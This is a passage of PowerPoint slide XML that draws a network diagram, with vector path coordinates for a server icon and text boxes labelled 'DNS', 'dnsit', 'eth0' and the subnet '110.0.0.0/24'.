                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0EF7D89-01EA-8D90-24BB-469D02D62173}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA061DD-7415-3821-0DBD-2C92C722022A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD909FE1-F2AE-9CE6-AEEA-CBEF6EB7BE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6598589" y="1968796"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8113B15-7247-33E5-A039-41974603B33C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208A2041-CBB6-27D9-39B9-34A5BF0E7DFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC03C1E-0580-29A8-B578-B6A5746C87A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373670" y="1644027"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>110.0.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25ABC97F-3FE4-65B9-14E5-E46C6BF978BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346573" y="5294208"/>
            <a:ext cx="1756921" cy="23324"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68CA491B-0346-7120-81DF-D94E1811B1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5069517" y="5457813"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9E60F8-A190-B1E2-E70F-F9738B559FA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
